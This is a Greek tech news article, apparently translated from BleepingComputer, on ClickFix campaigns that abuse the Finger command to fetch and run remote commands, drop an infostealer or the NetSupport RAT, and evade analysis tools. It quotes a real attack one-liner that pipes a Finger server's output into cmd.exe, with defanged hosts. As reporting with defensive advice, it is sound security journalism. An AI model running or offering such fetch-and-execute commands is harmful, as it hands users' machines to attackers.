By using this site, you agree to the Privacy Policy and Terms of Use.
Accept
TechReport.grTechReport.grTechReport.gr
Search
© 2022 Foxiz News Network. Ruby Design Company. All Rights Reserved.
Reading: Το πρωτόκολλο «Finger» δεκαετιών καταχράστηκε σε επιθέσεις κακόβουλου λογισμικού ClickFix
Share
Sign In
Notification Show More
Font ResizerAa
TechReport.grTechReport.gr
Font ResizerAa
Search
Have an existing account? Sign In
Follow US
© 2022 Foxiz News Network. Ruby Design Company. All Rights Reserved.
TechReport.gr > Security > Το πρωτόκολλο «Finger» δεκαετιών καταχράστηκε σε επιθέσεις κακόβουλου λογισμικού ClickFix
Security

Το πρωτόκολλο «Finger» δεκαετιών καταχράστηκε σε επιθέσεις κακόβουλου λογισμικού ClickFix

Marizas Dimitris
Last updated: 15 Νοεμβρίου 2025 21:50
Marizas Dimitris
Share
SHARE


Η δεκαετίες εντολή “δάχτυλο” επιστρέφει, με τους παράγοντες απειλών να χρησιμοποιούν το πρωτόκολλο για να ανακτούν απομακρυσμένες εντολές για εκτέλεση σε συσκευές Windows.

Στο παρελθόν, οι άνθρωποι χρησιμοποιούσαν το εντολή δακτύλου για να αναζητήσετε πληροφορίες σχετικά με τοπικούς και απομακρυσμένους χρήστες σε συστήματα Unix και Linux μέσω του πρωτοκόλλου Finger, μια εντολή που προστέθηκε αργότερα στα Windows. Αν και εξακολουθεί να υποστηρίζεται, χρησιμοποιείται σπάνια σήμερα σε σύγκριση με τη δημοτικότητά του πριν από δεκαετίες.

Όταν εκτελείται, η εντολή δακτύλου επιστρέφει βασικές πληροφορίες σχετικά με έναν χρήστη, συμπεριλαμβανομένων του ονόματος σύνδεσής του, του ονόματος (αν έχει οριστεί στο /etc/passwd), του οικιακού καταλόγου, των αριθμών τηλεφώνου, της τελευταίας εμφάνισης και άλλων λεπτομερειών.

Wiz
Έξοδος εντολής δακτύλου
Έξοδος εντολής δακτύλου
Πηγή: BleepingComputer

Πρόσφατα, υπήρξαν κακόβουλες καμπάνιες που χρησιμοποιούν το πρωτόκολλο Finger σε κάτι που φαίνεται να είναι επιθέσεις ClickFix που ανακτούν εντολές για εκτέλεση σε συσκευές.

Δεν είναι η πρώτη φορά που γίνεται κατάχρηση της εντολής του δακτύλου με αυτόν τον τρόπο, καθώς οι ερευνητές προειδοποίησαν το 2020 ότι χρησιμοποιήθηκε ως LOLBIN για τη λήψη κακόβουλου λογισμικού και την αποφυγή εντοπισμού.

Κατάχρηση της εντολής του δακτύλου

Τον περασμένο μήνα, ερευνητής κυβερνοασφάλειας MalwareHunterTeam μοιράστηκε ένα αρχείο δέσμης [VirusTotal] με BleepingComputer που, όταν εκτελεστεί, θα χρησιμοποιούσε το “finger [email protected][.]com” εντολή για ανάκτηση εντολών από έναν απομακρυσμένο διακομιστή δακτύλων, οι οποίες στη συνέχεια εκτελούνταν τοπικά περνώντας τους μέσω του cmd.exe.

Μαζικό αρχείο που εκτελεί την εντολή δακτύλου για ανάκτηση ενός σεναρίου
Πηγή: BleepingComputer

Ενώ αυτός ο κεντρικός υπολογιστής δεν είναι πλέον προσβάσιμος, το MalwareHunterTeam βρήκε επιπλέον δείγματα κακόβουλου λογισμικού και επιθέσεις χρησιμοποιώντας την εντολή δακτύλου.

Για παράδειγμα, ένα άτομο στο Reddit προειδοποίησε πρόσφατα ότι έπεσε θύμα μιας επίθεσης ClickFix που υποδύθηκε ένα Captcha, προτρέποντάς τους να εκτελέσουν μια εντολή των Windows για να επαληθεύσουν ότι ήταν άνθρωποι.

“Μόλις έπεσα για να επιβεβαιώσω ότι είσαι άνθρωπος win + r. Τι να κάνω;”, διαβάζει το Ανάρτηση στο Reddit.

“Ήμουν σε μια βιασύνη και έπεσα σε αυτό και κατέληξα να εισαγάγω τα ακόλουθα στη γραμμή εντολών cmd μου:”

“cmd /c start “” /min cmd /c “finger [email protected][.]org | cmd” && echo’ Βεβαιωθείτε ότι είστε άνθρωπος–πατήστε ENTER'”

Παρόλο που ο κεντρικός υπολογιστής δεν ανταποκρίνεται πλέον σε αιτήματα δακτύλων, ένας άλλος χρήστης του Reddit κατέγραψε την έξοδο.

Αυτή η επίθεση κάνει κατάχρηση του πρωτοκόλλου Finger ως απομακρυσμένης μεθόδου παράδοσης σεναρίου, εκτελώντας finger [email protected][.]org και διοχετεύει την έξοδο του μέσω του επεξεργαστή εντολών των Windows, cmd.exe.

Αυτό προκαλεί την εκτέλεση των ανακτημένων εντολών, η οποία δημιουργεί μια διαδρομή με τυχαία ονομασία, αντιγράφει το curl.exe σε ένα τυχαίο όνομα αρχείου, χρησιμοποιεί το μετονομασμένο εκτελέσιμο αρχείο curl για λήψη ενός αρχείου zip μεταμφιεσμένο σε PDF [VirusTotal] από το cloudmega[.]org και εξάγει ένα πακέτο κακόβουλου λογισμικού Python.

Τα περιεχόμενα του αρχείου μεταμφιεσμένα σε PDF
Τα περιεχόμενα του αρχείου μεταμφιεσμένα σε PDF
Πηγή: BleepingComputer

Στη συνέχεια, το πρόγραμμα Python θα εκτελεστεί χρησιμοποιώντας pythonw.exe __init__.py.

Η τελική εντολή που εκτελείται είναι μια κλήση πίσω στον διακομιστή του εισβολέα για επιβεβαίωση της εκτέλεσης, ενώ εμφανίζεται μια ψεύτικη προτροπή “Επαληθεύστε ότι είστε άνθρωπος” στον χρήστη.

Δεν είναι σαφές ποιος είναι ο σκοπός του πακέτου Python, αλλά α σχετικό αρχείο παρτίδας δείχνει ότι ήταν ένας κλέφτης πληροφοριών.

Το MalwareHunterTeam βρήκε επίσης μια παρόμοια καμπάνια που χρησιμοποιεί “finger [email protected] | cmd” για να ανακτήσετε και να εκτελέσετε εντολές σχεδόν πανομοιότυπες με την προαναφερθείσα επίθεση ClickFix.

Έξοδος εντολής δακτύλου
Έξοδος εντολής δακτύλου
Πηγή: BleepingComputer

Το BleepingComputer βρήκε ότι πρόκειται για μια πιο εξελιγμένη επίθεση, με τις εντολές να αναζητούν εργαλεία που χρησιμοποιούνται συνήθως στην έρευνα για κακόβουλο λογισμικό και να βγαίνουν εάν βρεθούν. Αυτά τα εργαλεία περιλαμβάνουν filemon, regmon, procexp, procexp64, tcpview, tcpview64, Procmon, Procmon64, vmmap, vmmap64, portmon, processlasso, Wireshark, Fiddler, Everywhere, Fiddler, ida, ida64, ImmunityDebugger, x32dbg, Windum OllyDbg και ProcessHacker.

Εάν δεν βρεθούν εργαλεία ανάλυσης κακόβουλου λογισμικού, οι εντολές θα κατεβάσουν ένα αρχείο zip μεταμφιεσμένο σε αρχεία PDF και θα το εξαγάγουν. Ωστόσο, αντί να εξάγει ένα κακόβουλο πακέτο Python από το ψεύτικο PDF, εξάγει το πακέτο RAT του NetSupport Manager.

NetSupport Manager RAT
NetSupport Manager RAT
Πηγή: BleepingComputer

Στη συνέχεια, οι εντολές θα διαμορφώσουν μια προγραμματισμένη εργασία για την εκκίνηση του κακόβουλου λογισμικού απομακρυσμένης πρόσβασης όταν ο χρήστης συνδεθεί.

Ενώ η τρέχουσα κατάχρηση «δάχτυλων» φαίνεται να πραγματοποιείται από έναν μεμονωμένο παράγοντα απειλής που διεξάγει επιθέσεις ClickFix, καθώς οι άνθρωποι συνεχίζουν να τις ερωτεύονται, είναι σημαντικό να γνωρίζουμε τις καμπάνιες.

Για το Defenders, ο καλύτερος τρόπος για να αποκλείσετε τη χρήση της εντολής δακτύλου είναι να αποκλείσετε την εξερχόμενη κίνηση στη θύρα TCP 79, η οποία χρησιμοποιείται για τη σύνδεση με έναν δαίμονα μέσω του πρωτοκόλλου Finger.


Wiz

Καθώς το MCP (Model Context Protocol) γίνεται το πρότυπο για τη σύνδεση LLM με εργαλεία και δεδομένα, οι ομάδες ασφαλείας προχωρούν γρήγορα για να διατηρήσουν αυτές τις νέες υπηρεσίες ασφαλείς.

Αυτό το δωρεάν φύλλο εξαπάτησης περιγράφει 7 βέλτιστες πρακτικές που μπορείτε να αρχίσετε να χρησιμοποιείτε σήμερα.



VIA: bleepingcomputer.com

Αξιοποίηση κρίσιμης ευπάθειας Fortinet FortiWeb στη φύση για τη δημιουργία λογαριασμών διαχειριστή
Η Ιταλία επιβάλλει πρόστιμο 116 εκατομμυρίων δολαρίων στην Apple για θέματα πολιτικής απορρήτου του App Store
Ανατρεπτική Εξέλιξη: Η Microsoft Αποκαλύπτει Πώς Θα Συναινείτε στην Πρόσβαση AI Agents σε Τα Αρχεία σας στα Windows 11!
Η κρίσιμη ευπάθεια Dell Data Lakehouse επιτρέπει στον απομακρυσμένο εισβολέα να κλιμακώσει τα προνόμια
Η Google εργάζεται σε κάθετες καρτέλες για το Chrome
TAGGED:CaptchaLLMNetSupport ManagerRedditWindowsΔάχτυλοΚακόβουλο λογισμικόΚάντε κλικ Διόρθωση

Sign Up For Daily Newsletter

Be keep up! Get the latest breaking news delivered straight to your inbox.
[mc4wp_form]
By signing up, you agree to our Terms of Use and acknowledge the data practices in our Privacy Policy. You may unsubscribe at any time.
Share This Article
Facebook Copy Link Print
Share
ByMarizas Dimitris
Follow:
Ο Δημήτρης είναι παθιασμένος με την τεχνολογία και τις καινοτομίες. Λατρεύει να εξερευνά νέες ιδέες, να επιλύει σύνθετα προβλήματα και να βρίσκει τρόπους ώστε η τεχνολογία να γίνεται πιο ανθρώπινη, απολαυστική και προσιτή για όλους. Στον ελεύθερο χρόνο του ασχολείται με το σκάκι και το poker, απολαμβάνοντας την στρατηγική και τη δημιουργική σκέψη που απαιτούν.
Previous Article Το ESPN και άλλα κανάλια της Disney επιστρέφουν στο YouTube TV
Next Article 12 Underrated (And Cheap) Gadgets You Should Have On Your Radar
Δεν υπάρχουν Σχόλια

Αφήστε μια απάντηση Ακύρωση απάντησης

Η ηλ. διεύθυνση σας δεν δημοσιεύεται. Τα υποχρεωτικά πεδία σημειώνονται με *

Stay Connected

248.1KLike
69.1KFollow
134KPin
54.3KFollow
banner banner
Create an Amazing Newspaper
Discover thousands of options, easy to customize layouts, one-click to import demo and much more.
Learn More

Latest News

«Σοκ! Νέα ομοσπονδιακή έρευνα αποκαλύπτει προβλήματα με τις ηλεκτρονικές απασφαλίσεις των θυρών στα Tesla Model 3!»
«Σοκ! Νέα ομοσπονδιακή έρευνα αποκαλύπτει προβλήματα με τις ηλεκτρονικές απασφαλίσεις των θυρών στα Tesla Model 3!»
Technology
Η HP διαρρέει οθόνες παιχνιδιών OMEN OLED ενόψει της CES 2026
Η HP διαρρέει οθόνες παιχνιδιών OMEN OLED ενόψει της CES 2026
Technology
Αυτή είναι η αλήθεια για τον μισθό που προσφέρει η OpenAI για την πιο στρεσογόνα δουλειά στον τομέα της Τεχνητής Νοημοσύνης! Δες το τώρα!
Αυτή είναι η αλήθεια για τον μισθό που προσφέρει η OpenAI για την πιο στρεσογόνα δουλειά στον τομέα της Τεχνητής Νοημοσύνης! Δες το τώρα!
Health Science Technology
Ανακαλύψτε τα Τελευταία Gadget του 2026: Οι Ευχές μας για ένα Συναρπαστικό Νέο Έτος!
Ανακαλύψτε τα Τελευταία Gadget του 2026: Οι Ευχές μας για ένα Συναρπαστικό Νέο Έτος!
Technology

You Might also Like

Security

Το τεστ ransomware AI-Slop εισέρχεται κρυφά στην αγορά VS Code

Marizas Dimitris
Marizas Dimitris
3 Min Read
Οι συνδρομές PayPal καταχρώνται για την αποστολή πλαστών email αγορών
Security

Οι συνδρομές PayPal καταχρώνται για την αποστολή πλαστών email αγορών

Marizas Dimitris
Marizas Dimitris
7 Min Read
Security

Η Eurofiber France προειδοποιεί για παραβίαση μετά την προσπάθεια χάκερ να πουλήσει δεδομένα πελατών

Marizas Dimitris
Marizas Dimitris
4 Min Read
//

We influence 20 million users and is the number one business and technology news network on the planet

Quick Link

  • Phones
    • iPhone – iOS
    • Android
    • Samsung
  • Computer
  • Internet
    • Security
  • Entertainment
    • Gaming
  • Business
  • Economics
    • Cryptos
  • Gadgets
  • Technology
    • Science
    • Reviews
    • How-To
  • Health
    • Psychology
  • Blog
  • My Bookmarks
  • Customize Interests
  • Home Technology
  • Contact
  • Technology Home 2
  • Technology Home 3
  • Technology Home 4
  • Technology Home 5

Support

  • Home
  • Πολιτική απορρήτου
  • Σχετικά με εμάς
  • Contact With TechReport
  • Greek Live Channels IPTV 2025

Sign Up for Our Newsletter

Subscribe to our newsletter to get our newest articles instantly!

[mc4wp_form id=”1616″]

TechReport.grTechReport.gr
Follow US
© 2022 Foxiz News Network. Ruby Design Company. All Rights Reserved.
Join Us!
Subscribe to our newsletter and never miss our latest news, podcasts etc..
[mc4wp_form]
Zero spam, Unsubscribe at any time.
Welcome Back!

Sign in to your account

Username or Email Address
Password

Lost your password?